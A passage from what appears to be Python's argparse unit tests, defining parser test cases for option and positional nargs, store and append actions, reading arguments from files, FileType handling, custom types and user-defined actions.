('-x a', NS(x='a')),
]
class TestOptionalsNargs1(ParserTestCase):
"""Tests specifying the 1 arg for an Optional"""
argument_signatures = [Sig('-x', nargs=1)]
failures = ['a', '-x']
successes = [
('', NS(x=None)),
('-x a', NS(x=['a'])),
]
class TestOptionalsNargs3(ParserTestCase):
"""Tests specifying the 3 args for an Optional"""
argument_signatures = [Sig('-x', nargs=3)]
failures = ['a', '-x', '-x a', '-x a b', 'a -x', 'a -x b']
successes = [
('', NS(x=None)),
('-x a b c', NS(x=['a', 'b', 'c'])),
]
class TestOptionalsNargsOptional(ParserTestCase):
"""Tests specifying an Optional arg for an Optional"""
argument_signatures = [
Sig('-w', nargs='?'),
Sig('-x', nargs='?', const=42),
Sig('-y', nargs='?', default='spam'),
Sig('-z', nargs='?', type=int, const='42', default='84'),
]
failures = ['2']
successes = [
('', NS(w=None, x=None, y='spam', z=84)),
('-w', NS(w=None, x=None, y='spam', z=84)),
('-w 2', NS(w='2', x=None, y='spam', z=84)),
('-x', NS(w=None, x=42, y='spam', z=84)),
('-x 2', NS(w=None, x='2', y='spam', z=84)),
('-y', NS(w=None, x=None, y=None, z=84)),
('-y 2', NS(w=None, x=None, y='2', z=84)),
('-z', NS(w=None, x=None, y='spam', z=42)),
('-z 2', NS(w=None, x=None, y='spam', z=2)),
]
class TestOptionalsNargsZeroOrMore(ParserTestCase):
"""Tests specifying an args for an Optional that accepts zero or more"""
argument_signatures = [
Sig('-x', nargs='*'),
Sig('-y', nargs='*', default='spam'),
]
failures = ['a']
successes = [
('', NS(x=None, y='spam')),
('-x', NS(x=[], y='spam')),
('-x a', NS(x=['a'], y='spam')),
('-x a b', NS(x=['a', 'b'], y='spam')),
('-y', NS(x=None, y=[])),
('-y a', NS(x=None, y=['a'])),
('-y a b', NS(x=None, y=['a', 'b'])),
]
class TestOptionalsNargsOneOrMore(ParserTestCase):
"""Tests specifying an args for an Optional that accepts one or more"""
argument_signatures = [
Sig('-x', nargs='+'),
Sig('-y', nargs='+', default='spam'),
]
failures = ['a', '-x', '-y', 'a -x', 'a -y b']
successes = [
('', NS(x=None, y='spam')),
('-x a', NS(x=['a'], y='spam')),
('-x a b', NS(x=['a', 'b'], y='spam')),
('-y a', NS(x=None, y=['a'])),
('-y a b', NS(x=None, y=['a', 'b'])),
]
class TestOptionalsChoices(ParserTestCase):
"""Tests specifying the choices for an Optional"""
argument_signatures = [
Sig('-f', choices='abc'),
Sig('-g', type=int, choices=range(5))]
failures = ['a', '-f d', '-fad', '-ga', '-g 6']
successes = [
('', NS(f=None, g=None)),
('-f a', NS(f='a', g=None)),
('-f c', NS(f='c', g=None)),
('-g 0', NS(f=None, g=0)),
('-g 03', NS(f=None, g=3)),
('-fb -g4', NS(f='b', g=4)),
]
class TestOptionalsRequired(ParserTestCase):
"""Tests the an optional action that is required"""
argument_signatures = [
Sig('-x', type=int, required=True),
]
failures = ['a', '']
successes = [
('-x 1', NS(x=1)),
('-x42', NS(x=42)),
]
class TestOptionalsActionStore(ParserTestCase):
"""Tests the store action for an Optional"""
argument_signatures = [Sig('-x', action='store')]
failures = ['a', 'a -x']
successes = [
('', NS(x=None)),
('-xfoo', NS(x='foo')),
]
class TestOptionalsActionStoreConst(ParserTestCase):
"""Tests the store_const action for an Optional"""
argument_signatures = [Sig('-y', action='store_const', const=object)]
failures = ['a']
successes = [
('', NS(y=None)),
('-y', NS(y=object)),
]
class TestOptionalsActionStoreFalse(ParserTestCase):
"""Tests the store_false action for an Optional"""
argument_signatures = [Sig('-z', action='store_false')]
failures = ['a', '-za', '-z a']
successes = [
('', NS(z=True)),
('-z', NS(z=False)),
]
class TestOptionalsActionStoreTrue(ParserTestCase):
"""Tests the store_true action for an Optional"""
argument_signatures = [Sig('--apple', action='store_true')]
failures = ['a', '--apple=b', '--apple b']
successes = [
('', NS(apple=False)),
('--apple', NS(apple=True)),
]
class TestOptionalsActionAppend(ParserTestCase):
"""Tests the append action for an Optional"""
argument_signatures = [Sig('--baz', action='append')]
failures = ['a', '--baz', 'a --baz', '--baz a b']
successes = [
('', NS(baz=None)),
('--baz a', NS(baz=['a'])),
('--baz a --baz b', NS(baz=['a', 'b'])),
]
class TestOptionalsActionAppendWithDefault(ParserTestCase):
"""Tests the append action for an Optional"""
argument_signatures = [Sig('--baz', action='append', default=['X'])]
failures = ['a', '--baz', 'a --baz', '--baz a b']
successes = [
('', NS(baz=['X'])),
('--baz a', NS(baz=['X', 'a'])),
('--baz a --baz b', NS(baz=['X', 'a', 'b'])),
]
class TestOptionalsActionAppendConst(ParserTestCase):
"""Tests the append_const action for an Optional"""
argument_signatures = [
Sig('-b', action='append_const', const=Exception),
Sig('-c', action='append', dest='b'),
]
failures = ['a', '-c', 'a -c', '-bx', '-b x']
successes = [
('', NS(b=None)),
('-b', NS(b=[Exception])),
('-b -cx -b -cyz', NS(b=[Exception, 'x', Exception, 'yz'])),
]
class TestOptionalsActionAppendConstWithDefault(ParserTestCase):
"""Tests the append_const action for an Optional"""
argument_signatures = [
Sig('-b', action='append_const', const=Exception, default=['X']),
Sig('-c', action='append', dest='b'),
]
failures = ['a', '-c', 'a -c', '-bx', '-b x']
successes = [
('', NS(b=['X'])),
('-b', NS(b=['X', Exception])),
('-b -cx -b -cyz', NS(b=['X', Exception, 'x', Exception, 'yz'])),
]
class TestOptionalsActionCount(ParserTestCase):
"""Tests the count action for an Optional"""
argument_signatures = [Sig('-x', action='count')]
failures = ['a', '-x a', '-x b', '-x a -x b']
successes = [
('', NS(x=None)),
('-x', NS(x=1)),
]
# ================
# Positional tests
# ================
class TestPositionalsNargsNone(ParserTestCase):
"""Test a Positional that doesn't specify nargs"""
argument_signatures = [Sig('foo')]
failures = ['', '-x', 'a b']
successes = [
('a', NS(foo='a')),
]
class TestPositionalsNargs1(ParserTestCase):
"""Test a Positional that specifies an nargs of 1"""
argument_signatures = [Sig('foo', nargs=1)]
failures = ['', '-x', 'a b']
successes = [
('a', NS(foo=['a'])),
]
class TestPositionalsNargs2(ParserTestCase):
"""Test a Positional that specifies an nargs of 2"""
argument_signatures = [Sig('foo', nargs=2)]
failures = ['', 'a', '-x', 'a b c']
successes = [
('a b', NS(foo=['a', 'b'])),
]
class TestPositionalsNargsZeroOrMore(ParserTestCase):
"""Test a Positional that specifies unlimited nargs"""
argument_signatures = [Sig('foo', nargs='*')]
failures = ['-x']
successes = [
('', NS(foo=[])),
('a', NS(foo=['a'])),
('a b', NS(foo=['a', 'b'])),
]
class TestPositionalsNargsZeroOrMoreDefault(ParserTestCase):
"""Test a Positional that specifies unlimited nargs and a default"""
argument_signatures = [Sig('foo', nargs='*', default='bar')]
failures = ['-x']
successes = [
('', NS(foo='bar')),
('a', NS(foo=['a'])),
('a b', NS(foo=['a', 'b'])),
]
class TestPositionalsNargsOneOrMore(ParserTestCase):
"""Test a Positional that specifies one or more nargs"""
argument_signatures = [Sig('foo', nargs='+')]
failures = ['', '-x']
successes = [
('a', NS(foo=['a'])),
('a b', NS(foo=['a', 'b'])),
]
class TestPositionalsNargsOptional(ParserTestCase):
"""Tests an Optional Positional"""
argument_signatures = [Sig('foo', nargs='?')]
failures = ['-x', 'a b']
successes = [
('', NS(foo=None)),
('a', NS(foo='a')),
]
class TestPositionalsNargsOptionalDefault(ParserTestCase):
"""Tests an Optional Positional with a default value"""
argument_signatures = [Sig('foo', nargs='?', default=42)]
failures = ['-x', 'a b']
successes = [
('', NS(foo=42)),
('a', NS(foo='a')),
]
class TestPositionalsNargsOptionalConvertedDefault(ParserTestCase):
"""Tests an Optional Positional with a default value
that needs to be converted to the appropriate type.
"""
argument_signatures = [
Sig('foo', nargs='?', type=int, default='42'),
]
failures = ['-x', 'a b', '1 2']
successes = [
('', NS(foo=42)),
('1', NS(foo=1)),
]
class TestPositionalsNargsNoneNone(ParserTestCase):
"""Test two Positionals that don't specify nargs"""
argument_signatures = [Sig('foo'), Sig('bar')]
failures = ['', '-x', 'a', 'a b c']
successes = [
('a b', NS(foo='a', bar='b')),
]
class TestPositionalsNargsNone1(ParserTestCase):
"""Test a Positional with no nargs followed by one with 1"""
argument_signatures = [Sig('foo'), Sig('bar', nargs=1)]
failures = ['', '--foo', 'a', 'a b c']
successes = [
('a b', NS(foo='a', bar=['b'])),
]
class TestPositionalsNargs2None(ParserTestCase):
"""Test a Positional with 2 nargs followed by one with none"""
argument_signatures = [Sig('foo', nargs=2), Sig('bar')]
failures = ['', '--foo', 'a', 'a b', 'a b c d']
successes = [
('a b c', NS(foo=['a', 'b'], bar='c')),
]
class TestPositionalsNargsNoneZeroOrMore(ParserTestCase):
"""Test a Positional with no nargs followed by one with unlimited"""
argument_signatures = [Sig('foo'), Sig('bar', nargs='*')]
failures = ['', '--foo']
successes = [
('a', NS(foo='a', bar=[])),
('a b', NS(foo='a', bar=['b'])),
('a b c', NS(foo='a', bar=['b', 'c'])),
]
class TestPositionalsNargsNoneOneOrMore(ParserTestCase):
"""Test a Positional with no nargs followed by one with one or more"""
argument_signatures = [Sig('foo'), Sig('bar', nargs='+')]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo='a', bar=['b'])),
('a b c', NS(foo='a', bar=['b', 'c'])),
]
class TestPositionalsNargsNoneOptional(ParserTestCase):
"""Test a Positional with no nargs followed by one with an Optional"""
argument_signatures = [Sig('foo'), Sig('bar', nargs='?')]
failures = ['', '--foo', 'a b c']
successes = [
('a', NS(foo='a', bar=None)),
('a b', NS(foo='a', bar='b')),
]
class TestPositionalsNargsZeroOrMoreNone(ParserTestCase):
"""Test a Positional with unlimited nargs followed by one with none"""
argument_signatures = [Sig('foo', nargs='*'), Sig('bar')]
failures = ['', '--foo']
successes = [
('a', NS(foo=[], bar='a')),
('a b', NS(foo=['a'], bar='b')),
('a b c', NS(foo=['a', 'b'], bar='c')),
]
class TestPositionalsNargsOneOrMoreNone(ParserTestCase):
"""Test a Positional with one or more nargs followed by one with none"""
argument_signatures = [Sig('foo', nargs='+'), Sig('bar')]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo=['a'], bar='b')),
('a b c', NS(foo=['a', 'b'], bar='c')),
]
class TestPositionalsNargsOptionalNone(ParserTestCase):
"""Test a Positional with an Optional nargs followed by one with none"""
argument_signatures = [Sig('foo', nargs='?', default=42), Sig('bar')]
failures = ['', '--foo', 'a b c']
successes = [
('a', NS(foo=42, bar='a')),
('a b', NS(foo='a', bar='b')),
]
class TestPositionalsNargs2ZeroOrMore(ParserTestCase):
"""Test a Positional with 2 nargs followed by one with unlimited"""
argument_signatures = [Sig('foo', nargs=2), Sig('bar', nargs='*')]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo=['a', 'b'], bar=[])),
('a b c', NS(foo=['a', 'b'], bar=['c'])),
]
class TestPositionalsNargs2OneOrMore(ParserTestCase):
"""Test a Positional with 2 nargs followed by one with one or more"""
argument_signatures = [Sig('foo', nargs=2), Sig('bar', nargs='+')]
failures = ['', '--foo', 'a', 'a b']
successes = [
('a b c', NS(foo=['a', 'b'], bar=['c'])),
]
class TestPositionalsNargs2Optional(ParserTestCase):
"""Test a Positional with 2 nargs followed by one optional"""
argument_signatures = [Sig('foo', nargs=2), Sig('bar', nargs='?')]
failures = ['', '--foo', 'a', 'a b c d']
successes = [
('a b', NS(foo=['a', 'b'], bar=None)),
('a b c', NS(foo=['a', 'b'], bar='c')),
]
class TestPositionalsNargsZeroOrMore1(ParserTestCase):
"""Test a Positional with unlimited nargs followed by one with 1"""
argument_signatures = [Sig('foo', nargs='*'), Sig('bar', nargs=1)]
failures = ['', '--foo', ]
successes = [
('a', NS(foo=[], bar=['a'])),
('a b', NS(foo=['a'], bar=['b'])),
('a b c', NS(foo=['a', 'b'], bar=['c'])),
]
class TestPositionalsNargsOneOrMore1(ParserTestCase):
"""Test a Positional with one or more nargs followed by one with 1"""
argument_signatures = [Sig('foo', nargs='+'), Sig('bar', nargs=1)]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo=['a'], bar=['b'])),
('a b c', NS(foo=['a', 'b'], bar=['c'])),
]
class TestPositionalsNargsOptional1(ParserTestCase):
"""Test a Positional with an Optional nargs followed by one with 1"""
argument_signatures = [Sig('foo', nargs='?'), Sig('bar', nargs=1)]
failures = ['', '--foo', 'a b c']
successes = [
('a', NS(foo=None, bar=['a'])),
('a b', NS(foo='a', bar=['b'])),
]
class TestPositionalsNargsNoneZeroOrMore1(ParserTestCase):
"""Test three Positionals: no nargs, unlimited nargs and 1 nargs"""
argument_signatures = [
Sig('foo'),
Sig('bar', nargs='*'),
Sig('baz', nargs=1),
]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo='a', bar=[], baz=['b'])),
('a b c', NS(foo='a', bar=['b'], baz=['c'])),
]
class TestPositionalsNargsNoneOneOrMore1(ParserTestCase):
"""Test three Positionals: no nargs, one or more nargs and 1 nargs"""
argument_signatures = [
Sig('foo'),
Sig('bar', nargs='+'),
Sig('baz', nargs=1),
]
failures = ['', '--foo', 'a', 'b']
successes = [
('a b c', NS(foo='a', bar=['b'], baz=['c'])),
('a b c d', NS(foo='a', bar=['b', 'c'], baz=['d'])),
]
class TestPositionalsNargsNoneOptional1(ParserTestCase):
"""Test three Positionals: no nargs, optional narg and 1 nargs"""
argument_signatures = [
Sig('foo'),
Sig('bar', nargs='?', default=0.625),
Sig('baz', nargs=1),
]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo='a', bar=0.625, baz=['b'])),
('a b c', NS(foo='a', bar='b', baz=['c'])),
]
class TestPositionalsNargsOptionalOptional(ParserTestCase):
"""Test two optional nargs"""
argument_signatures = [
Sig('foo', nargs='?'),
Sig('bar', nargs='?', default=42),
]
failures = ['--foo', 'a b c']
successes = [
('', NS(foo=None, bar=42)),
('a', NS(foo='a', bar=42)),
('a b', NS(foo='a', bar='b')),
]
class TestPositionalsNargsOptionalZeroOrMore(ParserTestCase):
"""Test an Optional narg followed by unlimited nargs"""
argument_signatures = [Sig('foo', nargs='?'), Sig('bar', nargs='*')]
failures = ['--foo']
successes = [
('', NS(foo=None, bar=[])),
('a', NS(foo='a', bar=[])),
('a b', NS(foo='a', bar=['b'])),
('a b c', NS(foo='a', bar=['b', 'c'])),
]
class TestPositionalsNargsOptionalOneOrMore(ParserTestCase):
"""Test an Optional narg followed by one or more nargs"""
argument_signatures = [Sig('foo', nargs='?'), Sig('bar', nargs='+')]
failures = ['', '--foo']
successes = [
('a', NS(foo=None, bar=['a'])),
('a b', NS(foo='a', bar=['b'])),
('a b c', NS(foo='a', bar=['b', 'c'])),
]
class TestPositionalsChoicesString(ParserTestCase):
"""Test a set of single-character choices"""
argument_signatures = [Sig('spam', choices=set('abcdefg'))]
failures = ['', '--foo', 'h', '42', 'ef']
successes = [
('a', NS(spam='a')),
('g', NS(spam='g')),
]
class TestPositionalsChoicesInt(ParserTestCase):
"""Test a set of integer choices"""
argument_signatures = [Sig('spam', type=int, choices=range(20))]
failures = ['', '--foo', 'h', '42', 'ef']
successes = [
('4', NS(spam=4)),
('15', NS(spam=15)),
]
class TestPositionalsActionAppend(ParserTestCase):
"""Test the 'append' action"""
argument_signatures = [
Sig('spam', action='append'),
Sig('spam', action='append', nargs=2),
]
failures = ['', '--foo', 'a', 'a b', 'a b c d']
successes = [
('a b c', NS(spam=['a', ['b', 'c']])),
]
# ========================================
# Combined optionals and positionals tests
# ========================================
class TestOptionalsNumericAndPositionals(ParserTestCase):
"""Tests negative number args when numeric options are present"""
argument_signatures = [
Sig('x', nargs='?'),
Sig('-4', dest='y', action='store_true'),
]
failures = ['-2', '-315']
successes = [
('', NS(x=None, y=False)),
('a', NS(x='a', y=False)),
('-4', NS(x=None, y=True)),
('-4 a', NS(x='a', y=True)),
]
class TestOptionalsAlmostNumericAndPositionals(ParserTestCase):
"""Tests negative number args when almost numeric options are present"""
argument_signatures = [
Sig('x', nargs='?'),
Sig('-k4', dest='y', action='store_true'),
]
failures = ['-k3']
successes = [
('', NS(x=None, y=False)),
('-2', NS(x='-2', y=False)),
('a', NS(x='a', y=False)),
('-k4', NS(x=None, y=True)),
('-k4 a', NS(x='a', y=True)),
]
class TestEmptyAndSpaceContainingArguments(ParserTestCase):
argument_signatures = [
Sig('x', nargs='?'),
Sig('-y', '--yyy', dest='y'),
]
failures = ['-y']
successes = [
([''], NS(x='', y=None)),
(['a badger'], NS(x='a badger', y=None)),
(['-a badger'], NS(x='-a badger', y=None)),
(['-y', ''], NS(x=None, y='')),
(['-y', 'a badger'], NS(x=None, y='a badger')),
(['-y', '-a badger'], NS(x=None, y='-a badger')),
(['--yyy=a badger'], NS(x=None, y='a badger')),
(['--yyy=-a badger'], NS(x=None, y='-a badger')),
]
class TestPrefixCharacterOnlyArguments(ParserTestCase):
parser_signature = Sig(prefix_chars='-+')
argument_signatures = [
Sig('-', dest='x', nargs='?', const='badger'),
Sig('+', dest='y', type=int, default=42),
Sig('-+-', dest='z', action='store_true'),
]
failures = ['-y', '+ -']
successes = [
('', NS(x=None, y=42, z=False)),
('-', NS(x='badger', y=42, z=False)),
('- X', NS(x='X', y=42, z=False)),
('+ -3', NS(x=None, y=-3, z=False)),
('-+-', NS(x=None, y=42, z=True)),
('- ===', NS(x='===', y=42, z=False)),
]
class TestNargsZeroOrMore(ParserTestCase):
"""Tests specifying an args for an Optional that accepts zero or more"""
argument_signatures = [Sig('-x', nargs='*'), Sig('y', nargs='*')]
failures = []
successes = [
('', NS(x=None, y=[])),
('-x', NS(x=[], y=[])),
('-x a', NS(x=['a'], y=[])),
('-x a -- b', NS(x=['a'], y=['b'])),
('a', NS(x=None, y=['a'])),
('a -x', NS(x=[], y=['a'])),
('a -x b', NS(x=['b'], y=['a'])),
]
class TestNargsRemainder(ParserTestCase):
"""Tests specifying a positional with nargs=REMAINDER"""
argument_signatures = [Sig('x'), Sig('y', nargs='...'), Sig('-z')]
failures = ['', '-z', '-z Z']
successes = [
('X', NS(x='X', y=[], z=None)),
('-z Z X', NS(x='X', y=[], z='Z')),
('X A B -z Z', NS(x='X', y=['A', 'B', '-z', 'Z'], z=None)),
('X Y --foo', NS(x='X', y=['Y', '--foo'], z=None)),
]
class TestOptionLike(ParserTestCase):
"""Tests options that may or may not be arguments"""
argument_signatures = [
Sig('-x', type=float),
Sig('-3', type=float, dest='y'),
Sig('z', nargs='*'),
]
failures = ['-x', '-y2.5', '-xa', '-x -a',
'-x -3', '-x -3.5', '-3 -3.5',
'-x -2.5', '-x -2.5 a', '-3 -.5',
'a x -1', '-x -1 a', '-3 -1 a']
successes = [
('', NS(x=None, y=None, z=[])),
('-x 2.5', NS(x=2.5, y=None, z=[])),
('-x 2.5 a', NS(x=2.5, y=None, z=['a'])),
('-3.5', NS(x=None, y=0.5, z=[])),
('-3-.5', NS(x=None, y=-0.5, z=[])),
('-3 .5', NS(x=None, y=0.5, z=[])),
('a -3.5', NS(x=None, y=0.5, z=['a'])),
('a', NS(x=None, y=None, z=['a'])),
('a -x 1', NS(x=1.0, y=None, z=['a'])),
('-x 1 a', NS(x=1.0, y=None, z=['a'])),
('-3 1 a', NS(x=None, y=1.0, z=['a'])),
]
class TestDefaultSuppress(ParserTestCase):
"""Test actions with suppressed defaults"""
argument_signatures = [
Sig('foo', nargs='?', default=argparse.SUPPRESS),
Sig('bar', nargs='*', default=argparse.SUPPRESS),
Sig('--baz', action='store_true', default=argparse.SUPPRESS),
]
failures = ['-x']
successes = [
('', NS()),
('a', NS(foo='a')),
('a b', NS(foo='a', bar=['b'])),
('--baz', NS(baz=True)),
('a --baz', NS(foo='a', baz=True)),
('--baz a b', NS(foo='a', bar=['b'], baz=True)),
]
class TestParserDefaultSuppress(ParserTestCase):
"""Test actions with a parser-level default of SUPPRESS"""
parser_signature = Sig(argument_default=argparse.SUPPRESS)
argument_signatures = [
Sig('foo', nargs='?'),
Sig('bar', nargs='*'),
Sig('--baz', action='store_true'),
]
failures = ['-x']
successes = [
('', NS()),
('a', NS(foo='a')),
('a b', NS(foo='a', bar=['b'])),
('--baz', NS(baz=True)),
('a --baz', NS(foo='a', baz=True)),
('--baz a b', NS(foo='a', bar=['b'], baz=True)),
]
class TestParserDefault42(ParserTestCase):
"""Test actions with a parser-level default of 42"""
parser_signature = Sig(argument_default=42, version='1.0')
argument_signatures = [
Sig('foo', nargs='?'),
Sig('bar', nargs='*'),
Sig('--baz', action='store_true'),
]
failures = ['-x']
successes = [
('', NS(foo=42, bar=42, baz=42)),
('a', NS(foo='a', bar=42, baz=42)),
('a b', NS(foo='a', bar=['b'], baz=42)),
('--baz', NS(foo=42, bar=42, baz=True)),
('a --baz', NS(foo='a', bar=42, baz=True)),
('--baz a b', NS(foo='a', bar=['b'], baz=True)),
]
class TestArgumentsFromFile(TempDirMixin, ParserTestCase):
"""Test reading arguments from a file"""
def setUp(self):
super(TestArgumentsFromFile, self).setUp()
file_texts = [
('hello', 'hello world!\n'),
('recursive', '-a\n'
'A\n'
'@hello'),
('invalid', '@no-such-path\n'),
]
for path, text in file_texts:
file = open(path, 'w')
file.write(text)
file.close()
parser_signature = Sig(fromfile_prefix_chars='@')
argument_signatures = [
Sig('-a'),
Sig('x'),
Sig('y', nargs='+'),
]
failures = ['', '-b', 'X', '@invalid', '@missing']
successes = [
('X Y', NS(a=None, x='X', y=['Y'])),
('X -a A Y Z', NS(a='A', x='X', y=['Y', 'Z'])),
('@hello X', NS(a=None, x='hello world!', y=['X'])),
('X @hello', NS(a=None, x='X', y=['hello world!'])),
('-a B @recursive Y Z', NS(a='A', x='hello world!', y=['Y', 'Z'])),
('X @recursive Z -a B', NS(a='B', x='X', y=['hello world!', 'Z'])),
]
class TestArgumentsFromFileConverter(TempDirMixin, ParserTestCase):
"""Test reading arguments from a file"""
def setUp(self):
super(TestArgumentsFromFileConverter, self).setUp()
file_texts = [
('hello', 'hello world!\n'),
]
for path, text in file_texts:
file = open(path, 'w')
file.write(text)
file.close()
class FromFileConverterArgumentParser(ErrorRaisingArgumentParser):
def convert_arg_line_to_args(self, arg_line):
for arg in arg_line.split():
if not arg.strip():
continue
yield arg
parser_class = FromFileConverterArgumentParser
parser_signature = Sig(fromfile_prefix_chars='@')
argument_signatures = [
Sig('y', nargs='+'),
]
failures = []
successes = [
('@hello X', NS(y=['hello', 'world!', 'X'])),
]
# =====================
# Type conversion tests
# =====================
class TestFileTypeRepr(TestCase):
def test_r(self):
type = argparse.FileType('r')
self.assertEqual("FileType('r')", repr(type))
def test_wb_1(self):
type = argparse.FileType('wb', 1)
self.assertEqual("FileType('wb', 1)", repr(type))
class RFile(object):
seen = {}
def __init__(self, name):
self.name = name
__hash__ = None
def __eq__(self, other):
if other in self.seen:
text = self.seen[other]
else:
text = self.seen[other] = other.read()
other.close()
if not isinstance(text, str):
text = text.decode('ascii')
return self.name == other.name == text
class TestFileTypeR(TempDirMixin, ParserTestCase):
"""Test the FileType option/argument type for reading files"""
def setUp(self):
super(TestFileTypeR, self).setUp()
for file_name in ['foo', 'bar']:
file = open(os.path.join(self.temp_dir, file_name), 'w')
file.write(file_name)
file.close()
self.create_readonly_file('readonly')
argument_signatures = [
Sig('-x', type=argparse.FileType()),
Sig('spam', type=argparse.FileType('r')),
]
failures = ['-x', '-x bar', 'non-existent-file.txt']
successes = [
('foo', NS(x=None, spam=RFile('foo'))),
('-x foo bar', NS(x=RFile('foo'), spam=RFile('bar'))),
('bar -x foo', NS(x=RFile('foo'), spam=RFile('bar'))),
('-x - -', NS(x=sys.stdin, spam=sys.stdin)),
('readonly', NS(x=None, spam=RFile('readonly'))),
]
class TestFileTypeRB(TempDirMixin, ParserTestCase):
"""Test the FileType option/argument type for reading files"""
def setUp(self):
super(TestFileTypeRB, self).setUp()
for file_name in ['foo', 'bar']:
file = open(os.path.join(self.temp_dir, file_name), 'w')
file.write(file_name)
file.close()
argument_signatures = [
Sig('-x', type=argparse.FileType('rb')),
Sig('spam', type=argparse.FileType('rb')),
]
failures = ['-x', '-x bar']
successes = [
('foo', NS(x=None, spam=RFile('foo'))),
('-x foo bar', NS(x=RFile('foo'), spam=RFile('bar'))),
('bar -x foo', NS(x=RFile('foo'), spam=RFile('bar'))),
('-x - -', NS(x=sys.stdin, spam=sys.stdin)),
]
class WFile(object):
seen = set()
def __init__(self, name):
self.name = name
__hash__ = None
def __eq__(self, other):
if other not in self.seen:
text = 'Check that file is writable.'
if 'b' in other.mode:
text = text.encode('ascii')
other.write(text)
other.close()
self.seen.add(other)
return self.name == other.name
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"non-root user required")
class TestFileTypeW(TempDirMixin, ParserTestCase):
"""Test the FileType option/argument type for writing files"""
def setUp(self):
super(TestFileTypeW, self).setUp()
self.create_readonly_file('readonly')
argument_signatures = [
Sig('-x', type=argparse.FileType('w')),
Sig('spam', type=argparse.FileType('w')),
]
failures = ['-x', '-x bar']
failures = ['-x', '-x bar', 'readonly']
successes = [
('foo', NS(x=None, spam=WFile('foo'))),
('-x foo bar', NS(x=WFile('foo'), spam=WFile('bar'))),
('bar -x foo', NS(x=WFile('foo'), spam=WFile('bar'))),
('-x - -', NS(x=sys.stdout, spam=sys.stdout)),
]
class TestFileTypeWB(TempDirMixin, ParserTestCase):
argument_signatures = [
Sig('-x', type=argparse.FileType('wb')),
Sig('spam', type=argparse.FileType('wb')),
]
failures = ['-x', '-x bar']
successes = [
('foo', NS(x=None, spam=WFile('foo'))),
('-x foo bar', NS(x=WFile('foo'), spam=WFile('bar'))),
('bar -x foo', NS(x=WFile('foo'), spam=WFile('bar'))),
('-x - -', NS(x=sys.stdout, spam=sys.stdout)),
]
class TestTypeCallable(ParserTestCase):
"""Test some callables as option/argument types"""
argument_signatures = [
Sig('--eggs', type=complex),
Sig('spam', type=float),
]
failures = ['a', '42j', '--eggs a', '--eggs 2i']
successes = [
('--eggs=42 42', NS(eggs=42, spam=42.0)),
('--eggs 2j -- -1.5', NS(eggs=2j, spam=-1.5)),
('1024.675', NS(eggs=None, spam=1024.675)),
]
class TestTypeUserDefined(ParserTestCase):
"""Test a user-defined option/argument type"""
class MyType(TestCase):
def __init__(self, value):
self.value = value
__hash__ = None
def __eq__(self, other):
return (type(self), self.value) == (type(other), other.value)
argument_signatures = [
Sig('-x', type=MyType),
Sig('spam', type=MyType),
]
failures = []
successes = [
('a -x b', NS(x=MyType('b'), spam=MyType('a'))),
('-xf g', NS(x=MyType('f'), spam=MyType('g'))),
]
class TestTypeClassicClass(ParserTestCase):
"""Test a classic class type"""
class C:
def __init__(self, value):
self.value = value
__hash__ = None
def __eq__(self, other):
return (type(self), self.value) == (type(other), other.value)
argument_signatures = [
Sig('-x', type=C),
Sig('spam', type=C),
]
failures = []
successes = [
('a -x b', NS(x=C('b'), spam=C('a'))),
('-xf g', NS(x=C('f'), spam=C('g'))),
]
class TestTypeRegistration(TestCase):
"""Test a user-defined type by registering it"""
def test(self):
def get_my_type(string):
return 'my_type{%s}' % string
parser = argparse.ArgumentParser()
parser.register('type', 'my_type', get_my_type)
parser.add_argument('-x', type='my_type')
parser.add_argument('y', type='my_type')
self.assertEqual(parser.parse_args('1'.split()),
NS(x=None, y='my_type{1}'))
self.assertEqual(parser.parse_args('-x 1 42'.split()),
NS(x='my_type{1}', y='my_type{42}'))
# ============
# Action tests
# ============
class TestActionUserDefined(ParserTestCase):
"""Test a user-defined option/argument action"""
class OptionalAction(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
try:
# check destination and option string
assert self.dest == 'spam', 'dest: %s' % self.dest
assert option_string == '-s', 'flag: %s' % option_string
# when option is before argument, badger=2, and when
# option is after argument, badger=<whatever was set>
expected_ns = NS(spam=0.25)
if value in [0.125, 0.625]:
expected_ns.badger = 2
elif value in [2.0]:
expected_ns.badger = 84
else:
raise AssertionError('value: %s' % value)
assert expected_ns == namespace, ('expected %s, got %s' %
(expected_ns, namespace))
except AssertionError:
e = sys.exc_info()[1]
raise ArgumentParserError('opt_action failed: %s' % e)
setattr(namespace, 'spam', value)
class PositionalAction(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
try:
assert option_string is None, ('option_string: %s' %
option_string)
# check destination
assert self.dest == 'badger', 'dest: %s' % self.dest
# when argument is before option, spam=0.25, and when
# option is after argument, spam=<whatever was set>
expected_ns = NS(badger=2)
if value in [42, 84]:
expected_ns.spam = 0.25
elif value in [1]:
expected_ns.spam = 0.625
elif value in [2]:
expected_ns.spam = 0.125
else:
raise AssertionError('value: %s' % value)
assert expected_ns == namespace, ('expected %s, got %s' %
(expected_ns, namespace))
except AssertionError:
e = sys.exc_info()[1]
raise ArgumentParserError('arg_action failed: %s' % e)
setattr(namespace, 'badger', value)
argument_signatures = [
Sig('-s', dest='spam', action=OptionalAction,
type=float, default=0.25),
Sig('badger', action=PositionalAction,
type=int, nargs='?', default=2),
]
failures = []
successes = [
('-s0.125', NS(spam=0.125, badger=2)),
('42', NS(spam=0.25, badger=42)),
('-s 0.625 1', NS(spam=0.625, badger=1)),
('84 -s2', NS(spam=2.0, badger=84)),
]
class TestActionRegistration(TestCase):
"""Test a user-defined action supplied by registering it"""
class MyAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, 'foo[%s]' % values)
def test(self):
parser = argparse.ArgumentParser()
parser.register('action', 'my_action', self.MyAction)
parser.add_argument('badger', action='my_action')
self.assertEqual(parser.parse_args(['1']), NS(badger='foo[1]'))
self.assertEqual(parser.parse_args(['42']), NS(badger='foo[42]'))
# ================
# Subparsers tests
# ================
class TestAddSubparsers(TestCase):
"""Test the add_subparsers method"""
def assertArgumentParserError(self, *args, **kwargs):
self.assertRaises(ArgumentParserError, *args, **kwargs)
def _get_parser(self, subparser_help=False, prefix_chars=None):
